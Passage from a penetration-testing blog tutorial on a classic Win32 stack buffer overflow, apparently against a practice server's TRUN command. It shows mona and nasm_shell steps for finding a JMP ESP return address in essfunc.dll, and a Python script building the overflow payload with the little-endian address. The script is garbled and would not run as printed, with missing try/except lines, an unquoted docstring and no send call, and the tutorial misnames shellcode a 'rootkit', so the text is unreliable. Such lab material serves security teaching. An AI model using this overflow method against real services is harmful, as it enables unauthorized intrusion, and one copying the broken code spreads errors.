November 4, 2019 · Basic Pen-Testing Adv. Pen-Testing

6.3 : Classic buffer overflow - Win32 buffer overflow (Part VII)

7. Generate a rootkit from metasploit msfvenom, append it to the payload without exploding the buffer

When we generate a rootkit, we need to look for a injectable memory address.

In this case, we can use mona .
It is a python module that analyse the memory address protection.

Download it, copy to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\ .

Restart your server & Immunity Debugger.

In the command input bar, we can hit

!mona help

to learn how to use mona.


Lets use modules function to look for dangerous memory ddl endpoint.
We want zero memory protections here.
No ASLR, no rebase etc.

!mona modules


The essfunc.dll is our target.

Lets look for the memory address in essfunc.dll by find command.
We need ffe4 for JMP ESP memory instruction.
You can use nasm_shell to learn why we search ffe4

[email protected]:/usr/share/metasploit-framework/tools# locate nasm_shell
[email protected]:/usr/share/metasploit-framework/tools# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp

Back to our modules, lets try this.

!mona find -s "\xff\xe4 -m essfunc.dll


So we have a few address can be used for exploit.
Lets choose the first one 625011af.

Here is one of the mose important thing you need to know about the memory address injection.
If your target is little Endian like x86 architecture, you need to reverse the memory address like this: "\af\x11\x50\x62"
Otherwise it should be "\x62\x50\x11\xaf"

Check the architecture for more.

So lets back to the immunity debugger.
We need to make sure the 625011af is triggered by our payload.
We can insert a breakpoint in this address to test if our exploit is working.

Click the blue arrow button

Enter address

Look for the address, right click, add break point

Lets run it.

import socket, sys

def prope(message):
    prope server

    :param message: request message
    :return: void
    host = ""
    port = 9999
    res = None
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((host, port))
        my_socket.settimeout(10)  # add this to prevent freeze the connection
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        # hide the success , look for failure, we need crash. we need failure.
        print("[success] %s:%s %s => %s" % (host, port, message, res))
        print("[error] %s:%s %s => None" % (host, port, len(message)))  # modify the output for testing ttl length
        # sys.exit()

def main():
    # memory address 625011af
    # shell = '\x62\x50\x11\xaf'
    shell = b"\xaf\x11\x50\x62"
    # shell = b"BBBB"
    payload = b"TRUN ." + b"A" * 2006 + shell
    # print(payload)
    print("completed test")

if __name__ == "__main__":

Noted that in python3 , we have to use bytestring to concat string.
Or it will add a extra \xc2 when the char cannot be parsed as UTF8


Lets get to the rootkit in next chapter.